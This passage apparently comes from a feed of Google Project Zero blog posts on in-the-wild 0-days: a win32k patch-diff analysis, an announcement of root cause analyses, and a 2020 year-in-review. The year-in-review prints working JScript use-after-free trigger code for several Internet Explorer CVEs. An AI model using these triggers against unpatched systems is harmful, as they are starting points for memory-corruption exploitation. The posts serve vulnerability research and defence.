win32kfull!EditionHandleAndPostKeyEvent+0xab005\n\n09 ffffa003`81fe6e10 ffff89ba`96b98c35 win32kbase!ApiSetEditionHandleAndPostKeyEvent+0x15b\n\n0a ffffa003`81fe6ec0 ffff89ba`96baada5 win32kbase!xxxUpdateGlobalsAndSendKeyEvent+0x2d5\n\n0b ffffa003`81fe7000 ffff89ba`96baa7fb win32kbase!xxxKeyEventEx+0x3a5\n\n0c ffffa003`81fe71d0 ffff89ba`964e3f44 win32kbase!xxxProcessKeyEvent+0x1ab\n\n0d ffffa003`81fe7250 ffff89ba`964e339b win32kfull!xxxInternalKeyEventDirect+0x1e4\n\n0e ffffa003`81fe7320 ffff89ba`964e2ccd win32kfull!xxxSendInput+0xc3\n\n0f ffffa003`81fe7390 fffff806`7ffd3b15 win32kfull!NtUserSendInput+0x16d\n\n10 ffffa003`81fe7440 00007ffb`7d0b2084 nt!KiSystemServiceCopyEnd+0x25\n\n11 0000002b`2a5ffba8 00007ff6`a4da1335 win32u!NtUserSendInput+0x14\n\n12 0000002b`2a5ffbb0 00007ffb`7f487bd4 WizardOpium+0x1335 &lt;\\- My POC\n\n13 0000002b2a5ffc10 00007ffb7f86ced1 KERNEL32!BaseThreadInitThunk+0x14\n\n14 0000002b2a5ffc40 0000000000000000 ntdll!RtlUserThreadStart+0x21\n\n \n\n\nBUILD_VERSION_STRING: 18362.1.amd64fre.19h1_release.190318-1202 \n \n--- \n \n** \n**\n\nTo trigger the crash, I only had to change two things in the Windows 7 POC:\n\n 1. The keystrokes are different to trigger the xxxNextWindow task switch window on Windows 10. I was able to trigger it by smashing CTRL+ALT+TAB while the POC was running (and triggering the normal task switch Window). It is possible to do this programmatically, I just didn\u2019t take the time to code it up.\n\n 2. Overwrite index 0x61 instead of 0x57 in the KernelCallbackTable.\n\n** \n**\n\nIt took me about 3 hours to get the POC to trigger Driver Verifier on Windows 10 1903 regularly (about every 3rd time it's run). \n\n[](<https://1.bp.blogspot.com/-DD9YxDSuvMo/Xpto6z2kcgI/AAAAAAAAPh8/Fl0ZjWF3vP4BGzmFhGrFkWBk_QKLfAhZwCNcBGAsYHQ/s1600/8_SidebySideDisasm2%2B%25281%2529.png>) \n \n--- \n \nDisassembly at xxxNextWindow+737 in Oct 2019 Update\n\n| \n\nDisassembly at xxxNextWindow+73F in Nov 2019 Update \n \n** \n**\n\nThe fix in the November update for Windows 10 1903 is the same as the Windows 7 fix: \n\n * Add the UnlockQueue function.\n\n * Add locking around the call to xxxNextWindow.\n\n * Check the \u201cdestroyed\u201d bitflag in the tagQ struct before proceeding to use the queue. \n\n** \n**\n\n# FIXING THE VULNERABILITY\n\nTo patch the CVE-2019-1433 vulnerability, Microsoft changed four functions: \n\n * xxxNextWindow\n\n * xxxKeyEvent (Windows 7)/EditionHandleAndPostKeyEvent (Windows 10)\n\n * zzzDestroyQueue\n\n * UnlockQueue (new function)\n\n** \n**\n\nOverall, the changes are to prevent the queue structure from being freed and track if something attempted to destroy the queue. The addition of the new function, UnlockQueue, suggests that there were no previous locking mechanisms for queue objects. \n\n** \n**\n\n## zzzDestroyQueue Patch\n\nThe only change to the zzzDestroyQueue function in win32k is that if the refcount on the tagQ structure (tagQ.cLockCount) is greater than 0 (keeping the queue from being freed immediately), then the function now sets a bit in tagQ.QF_flags. \n\n\n \n\n\n \n\n\n[](<https://1.bp.blogspot.com/-AfAFuVQf9ik/Xpto7GVoiTI/AAAAAAAAPiA/gHmTpfZvZRYzVnJsQgfaYrzLKBPHbSuZQCNcBGAsYHQ/s1600/9_DestroyQueueBindiff%2B%25281%2529.png>)\n\n \n\n\n \n\n\nzzzDestroyQueue Pre-Patch\n\n \n\n\n[](<https://1.bp.blogspot.com/-fqYi_u0Zxw8/Xpto7V4HOoI/AAAAAAAAPiE/Hu_tMFWdhnAMbn0CaOd4K_579uEBwQJMgCNcBGAsYHQ/s1600/A_DestroyQueueBindiff%25232%2B%25281%2529.png>)\n\n \n\n\n \n\n\nzzzDestroyQueue Post-Patch\n\n \n\n\nxxxNextWindow Patch\n\nThere is a single change to the xxxNextWindow function as shown by the BinDiff graph below. When execution is about to use the queue again (at what was LABEL_106 in the vulnerable version), a check has been added to see if a bitflag in tagQ.QF_flags is set. The instructions added to xxxNextWindow+0x847 are as follows where rbp is the pointer to the tagQ structure.\n\n** \n**\n\nbt dword ptr [rbp+13Ch], 1Ah\n\njb loc_FFFFF9600017A0C9 \n \n--- \n \n** \n**\n\nIf the bit is set, the function exists. If the bit is not set, the function continues and will use the queue. The only place this bit is set is in zzzDestroyQueue. The bit is set when the queue was destroyed, but couldn't be freed immediately because its refcount (tagQ.cLockCount) is greater than 0. Setting the bit is a new change to the code base as described in the section above. \n\n** \n**\n\n[](<https://1.bp.blogspot.com/-BGo0hE2WvZE/Xpto7nBs7XI/AAAAAAAAPiI/hWcK8Db2YZ8yAtB4EOL_R0cHJtxfD-wEACNcBGAsYHQ/s1600/B_xxxNextWindowChanges%2B%25281%2529.png>)\n\n** \n**\n\n## xxxKeyEvent (Windows 7)/EditionHandleAndPostKeyEvent (Windows 10) Patch\n\nIn this section I will simply refer to the function as xxxKeyEvent since Windows 7 was the main platform analyzed. However, the changes are also found in the EditionHandleAndPostKeyEvent function in Windows 10. \n\n** \n**\n\nThe change to xxxKeyEvent is to thread lock the queue that is passed as the first argument to xxxNextWindow. Thread locking doesn\u2019t appear to be publicly documented by Microsoft. My understanding comes from Tarjei Mandt\u2019s 2011 Blackhat USA presentation, \u201c[Kernel Attacks through User-Mode Callbacks](<https://media.blackhat.com/bh-us-11/Mandt/BH_US_11_Mandt_win32k_WP.pdf>)\u201d. Thread locking is where objects are added to a thread\u2019s lock list, and their ref counter is increased in the process. This prevents them from being freed while they are still locked to the thread. \n\n** \n**\n\nThe new function, UnlockQueue, is used to unlock the queue. \n\n** \n**\n\nif ( !queue )\n\nqueue = gptiRit-&gt;pq;\n\nxxxNextWindow(queue, vkey_cp); \n \n--- \n \nxxxKeyEvent+92E Pre-Patch\n\n** \n**\n\nif ( !queue )\n\nqueue = gptiRit-&gt;pq;\n\n++queue-&gt;cLockCount;\n\ncurrWin32Thread = (tagTHREADINFO *)PsGetCurrentThreadWin32Thread(v62);\n\nthreadLockW32 = currWin32Thread-&gt;ptlW32;\n\ncurrWin32Thread-&gt;ptlW32 = (_TL *)&amp;threadLockW32;\n\nqueueCp = queue;\n\nunlockQueueFnPtr = (void (__fastcall *)(tagQ *))UnlockQueue;\n\nxxxNextWindow(queue, vkey_cp);\n\ncurrWin32Thread2 = (tagTHREADINFO *)PsGetCurrentThreadWin32Thread(v64);\n\ncurrWin32Thread2-&gt;ptlW32 = threadLockW32;\n\nunlockQueueFnPtr(queueCp); \n \n--- \n \nxxxKeyEvent+94E Post-Patch\n\n** \n**\n\n# CONCLUSION\n\nSo...I got it wrong. Based on the details provided by Kaspersky in their blog post, I attempted to patch diff the vulnerability in order to do a root cause analysis. It was only based on the feedback from Microsoft (Thanks, Microsoft!) and their guidance to look at the InitFunctionTables method, that I realized I had analyzed a different bug. I analyzed CVE-2019-1433 rather than CVE-2019-1458, the vulnerability exploited in the wild. The real root cause analysis for CVE-2019-1458 was documented by @florek_pl [here](<https://github.com/piotrflorczyk/cve-2019-1458_POC>).\n\n** \n**\n\nIf I had patch-diffed November 2019 to December 2019 rather than September to December, then I wouldn\u2019t have analyzed the wrong bug. This seems obvious after the fact, but when just starting out, I thought that maybe Windows 7, being so close to end of life, didn\u2019t get updates every single month. Now I know to not only rely on Windows Update, but also to look for KB articles and that I can download additional updates from the Microsoft Update Catalog.\n\n** \n**\n\nAlthough this blog post didn\u2019t turn out how I originally planned, I decided to share it in the hopes that it\u2019d encourage others to explore a platform new to them. It\u2019s often not a straight path, but if you\u2019re interested in Windows kernel research, this is how I got started. In addition, I think this was a fun and quite interesting bug!\n\n** \n**\n\nI didn\u2019t initially set out to do a patch diffing exercise on this vulnerability, but I do think that this work gives us another data point to use in disclosure discussions. It took me, someone with reversing, but no Windows experience, three weeks to understand the vulnerability and write a proof-of-concept. While I ended up doing this analysis for a vulnerability other than the one I intended, many attackers are not looking to patch-diff a specific vulnerability, but rather any vulnerability that they could potentially exploit. Therefore, I think that three weeks can be used as an approximate high upper bound since most attackers looking to use this technique will have more experience.\n\n \n\n", "modified": "2020-04-02T00:00:00", "published": "2020-04-02T00:00:00", "id": "GOOGLEPROJECTZERO:C2A64C2133DFD2ACB457C2DD2790CBF7", "href": "https://googleprojectzero.blogspot.com/2020/04/tfw-you-get-really-excited-you-patch.html", "type": "googleprojectzero", "title": "\nTFW you-get-really-excited-you-patch-diffed-a-0day-used-in-the-wild-but-then-find-out-it-is-the-wrong-vuln\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-14T19:22:34", "bulletinFamily": "info", "cvelist": ["CVE-2019-1107", "CVE-2019-11707", "CVE-2019-1367", "CVE-2019-13720", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-2215", "CVE-2019-7286", "CVE-2019-7287"], "description": "# Posted by Maddie Stone, Project Zero\n\n** \n**\n\nWhen a 0-day is exploited in the wild AND it is detected, we need to use that as an opportunity to learn as much as possible about the vulnerability and the exploit if we hope to make 0-day hard. One of the main methods to do that is to perform a root cause analysis (RCA) on the 0-day. \n\n** \n**\n\nOur effort on this began in earnest in the last quarter of 2019. Today we are beginning to publish the root cause analyses for 0-days exploited in the wild that we have completed. While we\u2019re publishing some in bulk now to play \u201ccatch-up\u201d, in the future we plan to post each one in a timely manner after it\u2019s detected and disclosed. We think publishing technical details in a timely manner is important for transparency and so that the whole of the security community can make informed decisions and actions. \n\n** \n**\n\nWe\u2019ve added a new column to the [\u201c0day In the Wild\u201d tracking spreadsheet](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=0>) that will link to any RCAs that we publish. We will also continue to update the following page on our blog as we publish additional RCAs.\n\n** \n**\n\n[0-Day Exploit Root Cause Analyses](<https://googleprojectzero.blogspot.com/p/rca.html>)\n\n** \n**\n\nFor each of these root cause analyses, we are using a template. We developed this template based on what we, at Project Zero, find important and actionable about 0-days exploited in-the-wild, but we\u2019d love your feedback on what other information would help you! We welcome any researchers and vendors who want to use our [template](<https://docs.google.com/document/d/1z1s__qj16DdhRvAg_TJlmRrXKosUSWfpm463Mjk24Vs/view>) and publish this information about 0-days they detect and/or analyze! \n\n** \n**\n\nWhen completing a root cause analysis we focus on the following areas.\n\n * Bug class\n\n * Details of the vulnerability, such as how to trigger, what it allows, etc.\n\n * Exploit method and whether or not it\u2019s a known method\n\n * Hypothesis of how the vulnerability was found (code audit, fuzzing, variant analysis, etc.)\n\n * Any historical, present, and future bug context such as previous related bugs\n\n * Areas for variant analysis and any found variants\n\n * Structural improvements\n\n * Can you also kill the entire bug class?\n\n * Is there a way to make it much harder to exploit?\n\n * Potential detection methods for similar 0-days\n\n * Brainstorming ways that this 0-day exploit could have been caught while it was still a 0-day. Please note that this is different from \u201cindicators of compromise\u201d because we\u2019re focusing on detecting while it\u2019s still a 0-day.\n\n** \n**\n\nWe selected these areas because the vulnerability details and exploit method provide in-depth explanation of facts of the exploit: what is the vulnerability, how does it work, and how was it exploited. Once we have the facts documented, we can then use those facts to inform our hypotheses and brainstorm how we can prevent the attackers from being able to do it again. While some of these ideas may be considered infeasible by vendors or not work well in practice, some will be (and already have been) reasonable and able to be launched. The overarching goal is to force brainstorming in the hope of taking actions informed by the detected 0-day: actions to better detect, actions to better lockdown, actions to prevent new vulnerabilities from being introduced, actions to make 0-day hard.\n\n** \n**\n\nOut of the 20 0-days for 2019 (more on what we decided to include/exclude in our tracking here), we completed 8 root cause analyses that we\u2019re publishing here today. These are 5 out of the 6 of the 0-days detected in August or later of 2019 (when I joined the team and started this initiative  ). In addition, we\u2019re publishing the two iOS 0-days from February 2019 that Project Zero reported to Apple in partnership with [Google's Threat Analysis Group](<https://blog.google/threat-analysis-group>), and a Firefox 0-day that Project Zero had reported to Firefox, that was also discovered independently in-the-wild.\n\n** \n**\n\n * [CVE-2019-7286](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-7286.html>): iOS use-after-free in CFPrefsDaemon\n\n * [CVE-2019-7287](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-7287.html>): iOS buffer overflow in ProvInfoIOKitUserClient\n\n * [CVE-2019-1107](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-11707.html>): Firefox type confusion in Array.pop\n\n * [CVE-2019-1367](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-1367.html>): JScript use-after-free in Internet Explorer\n\n * [CVE-2019-2215](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-2215.html>): Android use-after-free in Binder\n\n * [CVE-2019-13720](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-13720.html>): Chrome use-after-free in webaudio\n\n * CVE-2019-1429: JScript use-after-free in Internet Explorer (See [CVE-2019-1367](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-1367.html>))\n\n * [CVE-2019-1458](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-1458.html>): Windows win32k uninitialized variable in task switching\n\n** \n**\n\nThese RCAs provide technical details on what the vulnerability is and how it is exploited. We then hypothesize and brainstorm based on these details from our perspective as offensive security researchers. \n\n \n\n\nOur hope is that these analyses are helpful for others in the security and tech communities to act on data gleaned from detected 0-day exploits and help determine ways to make it more costly, more time consuming andmore difficult for attackers to use 0-days in the wild. Please [reach out](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=0&range=A18>) with any feedback and/or suggestions and we hope that others will also begin publishing information from the [RCA template](<https://docs.google.com/document/d/1z1s__qj16DdhRvAg_TJlmRrXKosUSWfpm463Mjk24Vs/view>) in the future.\n", "modified": "2020-07-29T00:00:00", "published": "2020-07-29T00:00:00", "id": "GOOGLEPROJECTZERO:4C8E7D595A367E9DA6260DA13FAF3886", "href": "https://googleprojectzero.blogspot.com/2020/07/root-cause-analyses-for-0-day-in-wild.html", "type": "googleprojectzero", "title": "\nRoot Cause Analyses for 0-day In-the-Wild Exploits\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-04T19:27:43", "bulletinFamily": "info", "cvelist": ["CVE-2014-9665", "CVE-2015-0093", "CVE-2015-0993", "CVE-2018-8653", "CVE-2019-0880", "CVE-2019-1367", "CVE-2019-13674", "CVE-2019-13695", "CVE-2019-13764", "CVE-2019-1429", "CVE-2019-5870", "CVE-2020-0674", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-15999", "CVE-2020-17008", "CVE-2020-27930", "CVE-2020-6383", "CVE-2020-6572", "CVE-2020-6820", "CVE-2021-1648"], "description": "A Year in Review of 0-days Exploited In-The-Wild in 2020\n\nPosted by Maddie Stone, Project Zero\n\n2020 was a year full of 0-day exploits. Many of the Internet\u2019s most popular browsers had their moment in the spotlight. Memory corruption is still the name of the game and how the vast majority of detected 0-days are getting in. While we tried new methods of 0-day detection with modest success, 2020 showed us that there is still a long way to go in detecting these 0-day exploits in-the-wild. But what may be the most notable fact is that 25% of the 0-days detected in 2020 are closely related to previously publicly disclosed vulnerabilities. In other words, 1 out of every 4 detected 0-day exploits could potentially have been avoided if a more thorough investigation and patching effort were explored. Across the industry, incomplete patches \u2014 patches that don\u2019t correctly and comprehensively fix the root cause of a vulnerability \u2014 allow attackers to use 0-days against users with less effort.\n\nSince mid-2019, Project Zero has dedicated an effort specifically to track, analyze, and learn from 0-days that are actively exploited in-the-wild. For the last 6 years, Project Zero\u2019s mission has been to \u201cmake 0-day hard\u201d. From that came the goal of our in-the-wild program: \u201cLearn from 0-days exploited in-the-wild in order to make 0-day hard.\u201d In order to ensure our work is actually making it harder to exploit 0-days, we need to understand how 0-days are actually being used. Continuously pushing forward the public\u2019s understanding of 0-day exploitation is only helpful when it doesn\u2019t diverge from the \u201cprivate state-of-the-art\u201d, what attackers are doing and are capable of. \n\nOver the last 18 months, we\u2019ve learned a lot about the active exploitation of 0-days and our work has matured and evolved with it. [For the 2nd year in a row](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>), we\u2019re publishing a \u201cYear in Review\u201d report of the previous year\u2019s detected 0-day exploits. The goal of this report is not to detail each individual exploit, but instead to analyze the exploits from the year as a group, looking for trends, gaps, lessons learned, successes, etc. If you\u2019re interested in each individual exploit\u2019s analysis, please check out our[ root cause analyses](<https://googleprojectzero.blogspot.com/p/rca.html>). \n\nWhen looking at the 24 0-days detected in-the-wild in 2020, there\u2019s an undeniable conclusion: increasing investment in correct and comprehensive patches is a huge opportunity for our industry to impact attackers using 0-days.\n\nA correct patch is one that fixes a bug with complete accuracy, meaning the patch no longer allows any exploitation of the vulnerability. A comprehensive patch applies that fix everywhere that it needs to be applied, covering all of the variants. We consider a patch to be complete only when it is both correct and comprehensive. When exploiting a single vulnerability or bug, there are often multiple ways to trigger the vulnerability, or multiple paths to access it. Many times we\u2019re seeing vendors block only the path that is shown in the proof-of-concept or exploit sample, rather than fixing the vulnerability as a whole, which would block all of the paths. Similarly, security researchers are often reporting bugs without following up on how the patch works and exploring related attacks.\n\nWhile the idea that incomplete patches are making it easier for attackers to exploit 0-days may be uncomfortable, the converse of this conclusion can give us hope. We have a clear path toward making 0-days harder. If more vulnerabilities are patched correctly and comprehensively, it will be harder for attackers to exploit 0-days.\n\n# This vulnerability looks familiar \ud83e\udd14\n\nAs stated in the introduction, 2020 included 0-day exploits that are similar to ones we\u2019ve seen before. 6 of 24 0-days exploits detected in-the-wild are closely related to publicly disclosed vulnerabilities. Some of these 0-day exploits only had to change a line or two of code to have a new working 0-day exploit. This section explains how each of these 6 actively exploited 0-days are related to a previously seen vulnerability. We\u2019re taking the time to detail each and show the minimal differences between the vulnerabilities to demonstrate that once you understand one of the vulnerabilities, it\u2019s much easier to then exploit another. \n\n\nProduct\n\n| \n\nVulnerability exploited in-the-wild\n\n| \n\nVariant of... \n \n---|---|--- \n \nMicrosoft Internet Explorer\n\n| \n\nCVE-2020-0674\n\n| \n\nCVE-2018-8653* CVE-2019-1367* CVE-2019-1429* \n \nMozilla Firefox\n\n| \n\nCVE-2020-6820\n\n| \n\nMozilla [Bug 1507180](<https://bugzilla.mozilla.org/show_bug.cgi?id=1507180>) \n \nGoogle Chrome\n\n| \n\nCVE-2020-6572\n\n| \n\nCVE-2019-5870\n\nCVE-2019-13695 \n \nMicrosoft Windows\n\n| \n\nCVE-2020-0986\n\n| \n\nCVE-2019-0880* \n \nGoogle Chrome/Freetype\n\n| \n\nCVE-2020-15999\n\n| \n\nCVE-2014-9665 \n \nApple Safari\n\n| \n\nCVE-2020-27930\n\n| \n\nCVE-2015-0093 \n \n* vulnerability was also exploited in-the-wild in previous years \n \n## Internet Explorer JScript CVE-2020-0674\n\nCVE-2020-0674 is the fourth vulnerability that\u2019s been exploited in this bug class in 2 years. The other three vulnerabilities are CVE-2018-8653, CVE-2019-1367, and CVE-2019-1429. In the [2019 year-in-review](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>) we devoted a section to these vulnerabilities. [Google\u2019s Threat Analysis Group attributed](<https://www.blog.google/threat-analysis-group/identifying-vulnerabilities-and-protecting-you-phishing/>) all four exploits to the same threat actor. It bears repeating, the same actor exploited similar vulnerabilities four separate times. For all four exploits, the attacker used the same vulnerability type and the same exact exploitation method. Fixing these vulnerabilities comprehensively the first time would have caused attackers to work harder or find new 0-days.\n\nJScript is the legacy Javascript engine in Internet Explorer. While it\u2019s legacy, [by default it is still enabled](<https://support.microsoft.com/en-us/topic/option-to-disable-jscript-execution-in-internet-explorer-9e3b5ab3-8115-4650-f3d8-e496e7f8e40e>) in Internet Explorer 11, which is a built-in feature of Windows 10 computers. The bug class, or type of vulnerability, is that a specific JScript object, a variable (uses the VAR struct), is not tracked by the garbage collector. I\u2019ve included the code to trigger each of the four vulnerabilities below to demonstrate how similar they are. Ivan Fratric from Project Zero wrote all of the included code that triggers the four vulnerabilities.\n\n### CVE-2018-8653\n\nIn December 2018, it was discovered that [CVE-2018-8653](<https://msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8653>) was being actively exploited. In this vulnerability, the this variable is not tracked by the garbage collector in the isPrototypeof callback. McAfee also wrote a [write-up going through each step of this exploit](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ie-scripting-flaw-still-a-threat-to-unpatched-systems-analyzing-cve-2018-8653/>). \n\nvar objs = new Array();\n\nvar refs = new Array();\n\nvar dummyObj = new Object();\n\nfunction getFreeRef()\n\n{\n\n// 5. delete prototype objects as well as ordinary objects\n\nfor ( var i = 0; i &lt; 10000; i++ ) {\n\nobjs[i] = 1;\n\n}\n\nCollectGarbage();\n\nfor ( var i = 0; i &lt; 200; i++ )\n\n{\n\nrefs[i].prototype = 1;\n\n}\n\n// 6. Garbage collector frees unused variable blocks.\n\n// This includes the one holding the \"this\" variable\n\nCollectGarbage();\n\n// 7. Boom\n\nalert(this);\n\n}\n\n// 1. create \"special\" objects for which isPrototypeOf can be invoked\n\nfor ( var i = 0; i &lt; 200; i++ ) {\n\nvar arr = new Array({ prototype: {} });\n\nvar e = new Enumerator(arr);\n\nrefs[i] = e.item();\n\n}\n\n// 2. create a bunch of ordinary objects\n\nfor ( var i = 0; i &lt; 10000; i++ ) {\n\nobjs[i] = new Object();\n\n}\n\n// 3. create objects to serve as prototypes and set up callbacks\n\nfor ( var i = 0; i &lt; 200; i++ ) {\n\nrefs[i].prototype = {};\n\nrefs[i].prototype.isPrototypeOf = getFreeRef;\n\n}\n\n// 4. calls isPrototypeOf. This sets up refs[100].prototype as \"this\" variable\n\n// During callback, the \"this\" variable won't be tracked by the Garbage collector\n\n// use different index if this doesn't work\n\ndummyObj instanceof refs[100]; \n \n--- \n \n### CVE-2019-1367\n\nIn September 2019, [CVE-2019-1367](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1367>) was detected as exploited in-the-wild. This is the same vulnerability type as CVE-2018-8653: a JScript variable object is not tracked by the garbage collector. This time though the variables that are not tracked are in the arguments array in the Array.sort callback.\n\nvar spray = new Array();\n\nfunction F() {\n\n// 2. Create a bunch of objects\n\nfor (var i = 0; i &lt; 20000; i++) spray[i] = new Object();\n\n// 3. Store a reference to one of them in the arguments array\n\n// The arguments array isn't tracked by garbage collector\n\narguments[0] = spray[5000];\n\n// 4. Delete the objects and call the garbage collector\n\n// All JSCript variables get reclaimed... \n\nfor (var i = 0; i &lt; 20000; i++) spray[i] = 1;\n\nCollectGarbage();\n\n// 5. But we still have reference to one of them in the\n\n// arguments array\n\nalert(arguments[0]);\n\n}\n\n// 1. Call sort with a custom callback\n\n[1,2].sort(F); \n \n--- \n \n### CVE-2019-1429\n\nThe CVE-2019-1367 patch did not actually fix the vulnerability triggered by the proof-of-concept above and exploited in the in-the-wild. The proof-of-concept for CVE-2019-1367 still worked even after the CVE-2019-1367 patch was applied! \n\nIn November 2019, Microsoft released another patch to address this gap. [CVE-2019-1429](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1429>) addressed the shortcomings of the CVE-2019-1367 and also fixed a variant. [The variant](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1947>) is that the variables in the arguments array are not tracked by the garbage collector in the toJson callback rather than the Array.sort callback. The only difference between the variant triggers is the highlighted lines. Instead of calling the Array.sort callback, we call the toJSON callback.\n\nvar spray = new Array();\n\nfunction F() {\n\n// 2. Create a bunch of objects\n\nfor (var i = 0; i &lt; 20000; i++) spray[i] = new Object();\n\n// 3. Store a reference to one of them in the arguments array\n\n// The arguments array isn't tracked by garbage collector\n\narguments[0] = spray[5000];\n\n// 4. Delete the objects and call the garbage collector\n\n// All JSCript variables get reclaimed... \n\nfor (var i = 0; i &lt; 20000; i++) spray[i] = 1;\n\nCollectGarbage();\n\n// 5. But we still have reference to one of them in the\n\n// arguments array\n\nalert(arguments[0]);\n\n}\n\n+ // 1. Cause toJSON callback to fire\n\n+ var o = {toJSON:F}\n\n+ JSON.stringify(o);\n\n- // 1. Call sort with a custom callback\n\n- [1,2].sort(F); \n \n--- \n \n### CVE-2020-0674\n\nIn January 2020, [CVE-2020-0674](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0674>) was detected as exploited in-the-wild. The vulnerability is that the named arguments are not tracked by the garbage collector in the Array.sort callback. The only changes required to the trigger for CVE-2019-1367 is to change the references to arguments[] to one of the arguments named in the function definition. For example, we replaced any instances of arguments[0] with arg1.\n\nvar spray = new Array();\n\n+ function F(arg1, arg2) {\n\n- function F() {\n\n// 2. Create a bunch of objects\n\nfor (var i = 0; i &lt; 20000; i++) spray[i] = new Object();\n\n// 3. Store a reference to one of them in one of the named arguments\n\n// The named arguments aren't tracked by garbage collector\n\n+ arg1 = spray[5000];\n\n- arguments[0] = spray[5000];\n\n// 4. Delete the objects and call the garbage collector\n\n// All JScript variables get reclaimed... \n\nfor (var i = 0; i &lt; 20000; i++) spray[i] = 1;\n\nCollectGarbage();\n\n// 5. But we still have reference to one of them in\n\n// a named argument\n\n+ alert(arg1);\n\n- alert(arguments[0]);\n\n}\n\n// 1. Call sort with a custom callback\n\n[1,2].sort(F); \n \n--- \n \n### CVE-2020-0968\n\nUnfortunately CVE-2020-0674 was not the end of this story, even though it was the fourth vulnerability of this type to be exploited in-the-wild. In April 2020, Microsoft patched [CVE-2020-0968](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2020-0968>), another Internet Explorer JScript vulnerability. When the bulletin was first released, it was designated as exploited in-the-wild, but the following day, Microsoft changed this field to say it was not exploited in-the-wild (see the revisions section at the bottom of the [advisory](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2020-0968>)). \n\nvar spray = new Array();\n\nfunction f1() {\n\nalert('callback 1');\n\nreturn spray[6000];\n\n}\n\nfunction f2() {\n\nalert('callback 2');\n\nspray = null;\n\nCollectGarbage();\n\nreturn 'a'\n\n}\n\nfunction boom() {\n\nvar e = o1;\n\nvar d = o2;\n\n// 3. the first callback (e.toString) happens\n\n// it returns one of the string variables\n\n// which is stored in a temporary variable\n\n// on the stack, not tracked by garbage collector\n\n// 4. Second callback (d.toString) happens\n\n// There, string variables get freed\n\n// and the space reclaimed\n\n// 5. Crash happens when attempting to access\n\n// string content of the temporary variable\n\nvar b = e + d;\n\nalert(b);\n\n}\n\n// 1. create two objects with toString callbacks\n\nvar o1 = { toString: f1 };\n\nvar o2 = { toString: f2 };\n\n// 2. create a bunch of string variables\n\nfor (var a = 0; a &lt; 20000; a++) {\n\nspray[a] = \"aaa\";\n\n}\n\nboom(); \n \n--- \n \nIn addition to the vulnerabilities themselves being very similar, the attacker used the same exploit method for each of the four 0-day exploits. This provided a type of \u201cplug and play\u201d quality to their 0-day development which would have reduced the amount of work required for each new 0-day exploit. \n\n## Firefox CVE-2020-6820\n\nMozilla patched [CVE-2020-6820 in Firefox with an out-of-band security update](<https://www.mozilla.org/en-US/security/advisories/mfsa2020-11/>) in April 2020. It is a use-after-free in the Cache subsystem. \n\nCVE-2020-6820 is a use-after-free of the CacheStreamControlParent when closing its last open read stream. The read stream is the response returned to the context process from a cache query. If the close or abort command is received while any read streams are still open, it triggers StreamList::CloseAll. If the StreamControl (must be the Parent which lives in the browser process in order to get the use-after-free in the browser process; the Child would only provide in renderer) still has ReadStreams when StreamList::CloseAll is called, then this will cause the CacheStreamControlParent to be freed. The mId member of the CacheStreamControl parent is then subsequently accessed, causing the use-after-free.\n\nThe execution patch for CVE-2020-6820 is:\n\nStreamList::CloseAll \u2190 Patched function\n\nCacheStreamControlParent::CloseAll\n\nCacheStreamControlParent::NotifyCloseAll\n\nStreamControl::CloseAllReadStreams\n\nFor each stream:\n\nReadStream::Inner::CloseStream\n\nReadStream::Inner::Close\n\nReadStream::Inner::NoteClosed\n\n\u2026\n\nStreamControl::NoteClosed\n\nStreamControl::ForgetReadStream\n\nCacheStreamControlParent/Child::NoteClosedAfterForget\n\nCacheStreamControlParent::RecvNoteClosed\n\nStreamList::NoteClosed\n\nIf StreamList is empty &amp;&amp; mStreamControl:\n\nCacheStreamControlParent::Shutdown\n\nSend__delete(this) \u2190 FREED HERE!\n\nPCacheStreamControlParent::SendCloseAll \u2190 Used here in call to Id() \n \n--- \n \nCVE-2020-6820 is a variant of an internally found Mozilla vulnerability, [Bug 1507180](<https://bugzilla.mozilla.org/show_bug.cgi?id=1507180>). 1507180 was discovered in November 2018 and [patched in December 2019](<https://hg.mozilla.org/mozilla-central/rev/cdf525897bff>). 1507180 is a use-after-free of the ReadStream in mReadStreamList in StreamList::CloseAll. While it was patched in December, [an explanatory comment](<https://hg.mozilla.org/mozilla-central/rev/25beb671c14a>) for why the December 2019 patch was needed was added in early March 2020. \n\nFor 150718 the execution path was the same as for CVE-2020-6820 except that the the use-after-free occurred earlier, in StreamControl::CloseAllReadStreams rather than a few calls \u201chigher\u201d in StreamList::CloseAll.\n\nIn my personal opinion, I have doubts about whether or not this vulnerability was actually exploited in-the-wild. As far as we know, no one (including myself or Mozilla engineers [[1](<https://bugzilla.mozilla.org/show_bug.cgi?id=1626728#c15>), [2](<https://bugzilla.mozilla.org/show_bug.cgi?id=1507180#c10>)]), has found a way to trigger this exploit without shutting down the process. Therefore, exploiting this vulnerability doesn\u2019t seem very practical. However, because it was marked as exploited in-the-wild in the advisory, it remains in our [in-the-wild tracking 